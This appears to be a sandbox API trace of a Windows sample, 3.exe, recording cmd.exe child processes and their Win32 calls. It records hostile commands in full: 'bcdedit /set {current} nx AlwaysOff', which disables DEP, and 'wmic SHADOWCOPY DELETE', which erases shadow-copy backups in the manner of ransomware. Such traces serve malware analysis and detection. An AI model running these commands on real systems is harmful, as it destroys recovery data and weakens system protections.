	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a3fa3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a3fa360, cchData=32 | out: lpLCData="Sat") returned 4
	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a3fa700, cchData=32 | out: lpLCData="Sun") returned 4
	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a3e7b40, cchData=8 | out: lpLCData=".") returned 2
	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a3fa4e0, cchData=8 | out: lpLCData=",") returned 2
	[0033.716] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0033.717] GetProcessHeap () returned 0x340000
	[0033.717] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x20c) returned 0x35b5b0
	[0033.717] GetConsoleTitleW (in: lpConsoleTitle=0x35b5b0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.717] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0033.717] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0
	[0033.717] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290
	[0033.718] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0
	[0033.718] GetProcessHeap () returned 0x340000
	[0033.718] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x4012) returned 0x35e220
	[0033.718] GetProcessHeap () returned 0x340000
	[0033.718] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35e220 | out: hHeap=0x340000) returned 1
	[0033.719] _wcsicmp (_String1="bcdedit.exe", _String2=")") returned 57
	[0033.719] _wcsicmp (_String1="FOR", _String2="bcdedit.exe") returned 4
	[0033.719] _wcsicmp (_String1="FOR/?", _String2="bcdedit.exe") returned 4
	[0033.719] _wcsicmp (_String1="IF", _String2="bcdedit.exe") returned 7
	[0033.719] _wcsicmp (_String1="IF/?", _String2="bcdedit.exe") returned 7
	[0033.719] _wcsicmp (_String1="REM", _String2="bcdedit.exe") returned 16
	[0033.719] _wcsicmp (_String1="REM/?", _String2="bcdedit.exe") returned 16
	[0033.719] GetProcessHeap () returned 0x340000
	[0033.719] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb0) returned 0x35b7d0
	[0033.719] GetProcessHeap () returned 0x340000
	[0033.719] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x28) returned 0x3545f0
	[0033.719] GetProcessHeap () returned 0x340000
	[0033.719] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x4a) returned 0x3599a0
	[0033.720] GetConsoleTitleW (in: lpConsoleTitle=0x24f9a0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.721] GetFileAttributesW (lpFileName="bcdedit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bcdedit.exe")) returned 0xffffffff
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="START") returned -17
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2
	[0033.721] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3
	[0033.722] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="START") returned -17
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7
	[0033.723] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16
	[0033.723] GetProcessHeap () returned 0x340000
	[0033.723] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x218) returned 0x35b890
	[0033.723] GetProcessHeap () returned 0x340000
	[0033.723] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x62) returned 0x35bab0
	[0033.723] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1
	[0033.724] GetProcessHeap () returned 0x340000
	[0033.724] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x420) returned 0x35bb20
	[0033.724] SetErrorMode (uMode=0x0) returned 0x0
	[0033.724] SetErrorMode (uMode=0x1) returned 0x0
	[0033.724] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x35bb30, lpFilePart=0x24f230 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24f230*="Desktop") returned 0x25
	[0033.724] SetErrorMode (uMode=0x0) returned 0x1
	[0033.724] GetProcessHeap () returned 0x340000
	[0033.724] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x35bb20, Size=0x74) returned 0x35bb20
	[0033.724] GetProcessHeap () returned 0x340000
	[0033.724] RtlSizeHeap (HeapHandle=0x340000, Flags=0x0, MemoryPointer=0x35bb20) returned 0x74
	[0033.724] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0033.724] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0033.725] GetProcessHeap () returned 0x340000
	[0033.725] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x128) returned 0x35bbb0
	[0033.725] GetProcessHeap () returned 0x340000
	[0033.725] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x240) returned 0x35bce0
	[0033.731] GetProcessHeap () returned 0x340000
	[0033.731] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x35bce0, Size=0x12a) returned 0x35bce0
	[0033.731] GetProcessHeap () returned 0x340000
	[0033.731] RtlSizeHeap (HeapHandle=0x340000, Flags=0x0, MemoryPointer=0x35bce0) returned 0x12a
	[0033.731] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0033.731] GetProcessHeap () returned 0x340000
	[0033.731] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xe8) returned 0x35be20
	[0033.731] GetProcessHeap () returned 0x340000
	[0033.731] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x35be20, Size=0x7e) returned 0x35be20
	[0033.731] GetProcessHeap () returned 0x340000
	[0033.731] RtlSizeHeap (HeapHandle=0x340000, Flags=0x0, MemoryPointer=0x35be20) returned 0x7e
	[0033.732] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.732] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x24efa0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24efa0) returned 0xffffffffffffffff
	[0033.732] GetLastError () returned 0x2
	[0033.732] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x24efa0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24efa0) returned 0xffffffffffffffff
	[0033.732] GetLastError () returned 0x2
	[0033.733] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x24efa0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24efa0) returned 0xffffffffffffffff
	[0033.733] GetLastError () returned 0x2
	[0033.733] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.733] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x24efa0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24efa0) returned 0x359a60
	[0034.124] GetProcessHeap () returned 0x340000
	[0034.124] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x28) returned 0x354620
	[0034.124] FindClose (in: hFindFile=0x359a60 | out: hFindFile=0x359a60) returned 1
	[0034.125] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
	[0034.125] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
	[0034.125] GetConsoleTitleW (in: lpConsoleTitle=0x24f4f0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0034.125] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f2a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f268 | out: lpAttributeList=0x24f2a8, lpSize=0x24f268) returned 1
	[0034.125] UpdateProcThreadAttribute (in: lpAttributeList=0x24f2a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f258, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f2a8, lpPreviousValue=0x0) returned 1
	[0034.125] GetStartupInfoW (in: lpStartupInfo=0x24f3c0 | out: lpStartupInfo=0x24f3c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0034.125] GetProcessHeap () returned 0x340000
	[0034.125] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x20) returned 0x354650
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0034.125] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0034.126] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0034.126] GetProcessHeap () returned 0x340000
	[0034.126] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x354650 | out: hHeap=0x340000) returned 1
	[0034.126] GetProcessHeap () returned 0x340000
	[0034.127] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x12) returned 0x358370
	[0034.127] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1
	[0034.128] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit.exe  /set {current} nx AlwaysOff", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x24f2e0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit.exe  /set {current} nx AlwaysOff", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f290 | out: lpCommandLine="bcdedit.exe  /set {current} nx AlwaysOff", lpProcessInformation=0x24f290*(hProcess=0x54, hThread=0x50, dwProcessId=0x9e0, dwThreadId=0x9e4)) returned 1
	[0034.131] CloseHandle (hObject=0x50) returned 1
	[0034.131] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0034.131] GetProcessHeap () returned 0x340000
	[0034.131] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35d730 | out: hHeap=0x340000) returned 1
	[0034.131] GetEnvironmentStringsW () returned 0x35cc40*
	[0034.131] GetProcessHeap () returned 0x340000
	[0034.131] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xae8) returned 0x35d730
	[0034.131] FreeEnvironmentStringsW (penv=0x35cc40) returned 1
	[0034.131] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0
	[0035.142] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x24f1d8 | out: lpExitCode=0x24f1d8*=0x0) returned 1
	[0035.142] CloseHandle (hObject=0x54) returned 1
	[0035.142] _vsnwprintf (in: _Buffer=0x24f448, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f1e8 | out: _Buffer="00000000") returned 8
	[0035.142] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
	[0035.143] GetProcessHeap () returned 0x340000
	[0035.143] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35d730 | out: hHeap=0x340000) returned 1
	[0035.143] GetEnvironmentStringsW () returned 0x35cc40*
	[0035.143] GetProcessHeap () returned 0x340000
	[0035.143] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb0e) returned 0x35ed40
	[0035.143] FreeEnvironmentStringsW (penv=0x35cc40) returned 1
	[0035.143] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0035.143] GetProcessHeap () returned 0x340000
	[0035.143] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35ed40 | out: hHeap=0x340000) returned 1
	[0035.143] GetEnvironmentStringsW () returned 0x35cc40*
	[0035.143] GetProcessHeap () returned 0x340000
	[0035.143] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb0e) returned 0x35ed40
	[0035.143] FreeEnvironmentStringsW (penv=0x35cc40) returned 1
	[0035.143] GetProcessHeap () returned 0x340000
	[0035.143] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x358370 | out: hHeap=0x340000) returned 1
	[0035.143] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f2a8 | out: lpAttributeList=0x24f2a8) 
	[0035.143] _get_osfhandle (_FileHandle=1) returned 0x7
	[0035.143] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0035.144] _get_osfhandle (_FileHandle=1) returned 0x7
	[0035.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3de194 | out: lpMode=0x4a3de194) returned 1
	[0035.144] _get_osfhandle (_FileHandle=0) returned 0x3
	[0035.144] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3de198 | out: lpMode=0x4a3de198) returned 1
	[0035.144] SetConsoleInputExeNameW () returned 0x1
	[0035.144] GetConsoleOutputCP () returned 0x1b5
	[0035.145] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0035.145] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0035.145] exit (_Code=0) 

Process:
	id = "8"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x51135000"
	os_pid = "0x9c0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x958"
	cmd_line = "/C wmic SHADOWCOPY DELETE"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 28
	os_tid = 0x9c4

	[0033.734] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf880 | out: lpSystemTimeAsFileTime=0x1cf880*(dwLowDateTime=0xc1e153d0, dwHighDateTime=0x1d5956c)) 
	[0033.734] GetCurrentProcessId () returned 0x9c0
	[0033.734] GetCurrentThreadId () returned 0x9c4
	[0033.734] GetTickCount () returned 0x1142b84
	[0033.734] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf888 | out: lpPerformanceCount=0x1cf888*=15383876840) returned 1
	[0033.735] GetModuleHandleW (lpModuleName=0x0) returned 0x4a3b0000
	[0033.735] __set_app_type (_Type=0x1) 
	[0033.735] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a3d7810) returned 0x0
	[0033.735] __getmainargs (in: _Argc=0x4a3fa608, _Argv=0x4a3fa618, _Env=0x4a3fa610, _DoWildCard=0, _StartInfo=0x4a3de0f4 | out: _Argc=0x4a3fa608, _Argv=0x4a3fa618, _Env=0x4a3fa610) returned 0
	[0033.735] GetCurrentThreadId () returned 0x9c4
	[0033.735] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c4) returned 0x3c
	[0033.736] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0033.736] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40
	[0033.736] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0033.736] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0033.736] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf818 | out: phkResult=0x1cf818*=0x0) returned 0x2
	[0033.736] VirtualQuery (in: lpAddress=0x1cf800, lpBuffer=0x1cf780, dwLength=0x30 | out: lpBuffer=0x1cf780*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.736] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf780, dwLength=0x30 | out: lpBuffer=0x1cf780*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.736] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf780, dwLength=0x30 | out: lpBuffer=0x1cf780*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.736] VirtualQuery (in: lpAddress=0xd4000, lpBuffer=0x1cf780, dwLength=0x30 | out: lpBuffer=0x1cf780*(BaseAddress=0xd4000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
